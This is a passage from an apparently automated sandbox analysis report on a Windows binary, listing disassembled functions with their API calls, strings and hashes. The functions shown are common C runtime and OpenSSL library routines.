                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                                                                                        • String ID:
                                                                                                        • API String ID: 626533743-0
                                                                                                        • Opcode ID: 61c81fba5533def4a58d7e79c24558907c2ad7088d0103b60c2c88f05aeec970
                                                                                                        • Instruction ID: 477a2b5d2735083591fed8bbf1e196250d97797bf43d6fde0d42bfd627e9a0d6
                                                                                                        • Opcode Fuzzy Hash: 61c81fba5533def4a58d7e79c24558907c2ad7088d0103b60c2c88f05aeec970
                                                                                                        • Instruction Fuzzy Hash: B5016D32903B04E6DE35AB68EC46B1D73A06F80BB1F24424EF464961D4CF7C9981FA51
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F606A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___from_strstr_to_strchr.LIBCMT ref: 00F607C3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ___from_strstr_to_strchr
                                                                                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                        • API String ID: 601868998-2416195885
                                                                                                        • Opcode ID: 8efe56cfd082f847a6ba93d5430b87f137a6768d0710965922821db13db9b15e
                                                                                                        • Instruction ID: c4ae6525ae7dea929a4baae36b1aac22e36582d8d8d85d8c624f68e8b99d0102
                                                                                                        • Opcode Fuzzy Hash: 8efe56cfd082f847a6ba93d5430b87f137a6768d0710965922821db13db9b15e
                                                                                                        • Instruction Fuzzy Hash: EF411971A043059BDB20EE25CC45BAFB3D9EF91354F00082EF585D3242EB79E9089BE2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00FD5D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __getptd_noexit.LIBCMT ref: 00FD5D3D
                                                                                                          • Part of subcall function 00F3501F: GetLastError.KERNEL32(00000001,00000000,00F3520D,00F30CE9,?,?,00F40E81,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F35021
                                                                                                          • Part of subcall function 00F3501F: __calloc_crt.LIBCMT ref: 00F35042
                                                                                                          • Part of subcall function 00F3501F: __initptd.LIBCMT ref: 00F35064
                                                                                                          • Part of subcall function 00F3501F: GetCurrentThreadId.KERNEL32 ref: 00F3506B
                                                                                                          • Part of subcall function 00F3501F: SetLastError.KERNEL32(00000000,00F40E81,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F35083
                                                                                                        • __calloc_crt.LIBCMT ref: 00FD5D60
                                                                                                        • __get_sys_err_msg.LIBCMT ref: 00FD5D7E
                                                                                                        • __get_sys_err_msg.LIBCMT ref: 00FD5DCD
                                                                                                        Strings
                                                                                                        • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00FD5D48, 00FD5D6E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                        • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                        • API String ID: 3123740607-798102604
                                                                                                        • Opcode ID: c4d141bb78757c81f78797d0f4c2c1e70a2ea7709c3376dffcc4daf0699c9c48
                                                                                                        • Instruction ID: 5509a4d0d749bdbeb60be43ec40d249dbd92c32bcf3d602493f2d11b563c8c2b
                                                                                                        • Opcode Fuzzy Hash: c4d141bb78757c81f78797d0f4c2c1e70a2ea7709c3376dffcc4daf0699c9c48
                                                                                                        • Instruction Fuzzy Hash: 7F11C472909E156BEB222A659C05AAB739FEF00FB0F140427FE09A6341E625ED0072B0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F72FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _fprintf_memset
                                                                                                        • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                        • API String ID: 3021507156-3399676524
                                                                                                        • Opcode ID: ed9b281a3a5282b379b408e5291dd4fc6dce32086c5aa42b869ad932dbd5927e
                                                                                                        • Instruction ID: 67463655a65df6f871ce74026ee85e6bad4e243baa3a39a9f88ec3e31b6b20a1
                                                                                                        • Opcode Fuzzy Hash: ed9b281a3a5282b379b408e5291dd4fc6dce32086c5aa42b869ad932dbd5927e
                                                                                                        • Instruction Fuzzy Hash: AA215772B043157BE620A925AC02FBB7799EFC1BACF048414FA54A71C6D622ED0562B3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F516EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00F51726
                                                                                                        • _strlen.LIBCMT ref: 00F51734
                                                                                                          • Part of subcall function 00F35208: __getptd_noexit.LIBCMT ref: 00F35208
                                                                                                        • _strnlen.LIBCMT ref: 00F517BF
                                                                                                        • __lock.LIBCMT ref: 00F517D0
                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00F517DB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2168648987-0
                                                                                                        • Opcode ID: 547a937b96ce860b70522214d523b5908f1a01dec0216b9d6b9278724be9cdff
                                                                                                        • Instruction ID: 8fe45847a179d9a1e3c72d60b94104e8734e2bdf51909a82e2245d216d8f5fbb
                                                                                                        • Opcode Fuzzy Hash: 547a937b96ce860b70522214d523b5908f1a01dec0216b9d6b9278724be9cdff
                                                                                                        • Instruction Fuzzy Hash: 59310832901615ABDB216B6CAC01B9F3694BF09B32F140115FE14EB181DB7CE90877E1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F4B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F4B70B
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: RtlAllocateHeap.NTDLL(00840000,00000000,00000001,00000001,?,?,?,00F40E81,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30CA5
                                                                                                        • _free.LIBCMT ref: 00F4B71E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1020059152-0
                                                                                                        • Opcode ID: 5acffc6d3482853ac073a56d5e783a9bd2a65b3e8835ef4f35b714c81fb2c4bb
                                                                                                        • Instruction ID: e997774a2bc46a52020599e57a7869bdce1cf829744a2b7bc8fb9ca0b744b098
                                                                                                        • Opcode Fuzzy Hash: 5acffc6d3482853ac073a56d5e783a9bd2a65b3e8835ef4f35b714c81fb2c4bb
                                                                                                        • Instruction Fuzzy Hash: 4411A33280971AABDB313F74AC45B6A3F94AF84770F104626FC94A6152DB38D840B7D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00F2F085
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2F0AC
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2F0B6
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2F0C4
                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00F2F0D2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: a44948d771143ea86287aa39d9e8f29fcb84e97e802f91f3d7cf2dc31bf4c040
                                                                                                        • Instruction ID: 9faf11597b1600051277c41f79166800a908067d39fcd4f0e2d40a96bcb3e2df
                                                                                                        • Opcode Fuzzy Hash: a44948d771143ea86287aa39d9e8f29fcb84e97e802f91f3d7cf2dc31bf4c040
                                                                                                        • Instruction Fuzzy Hash: FB01A731A5131D66EB309B65EC46F96376DBB48B10F604022FA00AF1C1D6B9A409DBD4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00F2E515
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2E53C
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2E546
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2E554
                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00F2E562
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: 39ca21055d3ba7cffc330222f6bad985d8c4621294c76baf55d27e999f10a0ac
                                                                                                        • Instruction ID: 4e929cbdba2a881915f4357394389e67da8a0a3dfc07c0703552db4d8319d38c
                                                                                                        • Opcode Fuzzy Hash: 39ca21055d3ba7cffc330222f6bad985d8c4621294c76baf55d27e999f10a0ac
                                                                                                        • Instruction Fuzzy Hash: 0501F731B5031A76EA309B60EC46F967B6DA748B04F640011FA00EB0D1D6B9A409D7D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00F2FA53
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2FA71
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2FA7B
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2FA89
                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00F2FA94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: 9084bce7841ed233a0f4f0d09e027d8ad33e80131c1a459614006df3394f7b41
                                                                                                        • Instruction ID: 0b5941db8a3e9ab7dc95ae4da6166710f1ccf100a1f9c23c847fb60c6870b0f8
                                                                                                        • Opcode Fuzzy Hash: 9084bce7841ed233a0f4f0d09e027d8ad33e80131c1a459614006df3394f7b41
                                                                                                        • Instruction Fuzzy Hash: 1301D631B50319B7EB209B64DC4AFA63B6DAB44B10F104021FA04AE1C1D7E5A804DAE0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F2FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00F2FE03
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2FE21
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F2FE2B
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F2FE39
                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00F2FE44
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: 9084bce7841ed233a0f4f0d09e027d8ad33e80131c1a459614006df3394f7b41
                                                                                                        • Instruction ID: 1f30717d283c1dfa8883156ebd5d356ccb979f168ba00534c78f7a44760c5429
                                                                                                        • Opcode Fuzzy Hash: 9084bce7841ed233a0f4f0d09e027d8ad33e80131c1a459614006df3394f7b41
                                                                                                        • Instruction Fuzzy Hash: 4301A231A50319A7EB215B64AC4AFA63B6DAB44B10F004021FA00AE1D1D7E5A805D6E0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F673F0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 251COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: $+$0123456789ABCDEF
                                                                                                        • API String ID: 1302938615-1400378107
                                                                                                        • Opcode ID: d7b4b9301899643b166fef40ff3c864582355cdbe9524b6c1717f0871e8d2f15
                                                                                                        • Instruction ID: faf36368b816c2b7db2699642c5e902e7cdd3be0df575f8a070333b9bf211c04
                                                                                                        • Opcode Fuzzy Hash: d7b4b9301899643b166fef40ff3c864582355cdbe9524b6c1717f0871e8d2f15
                                                                                                        • Instruction Fuzzy Hash: 1981ACB2A0C7508FD710DF29D840A2BBBE5BFC8758F18095DF999A3212D735ED019B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F27BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
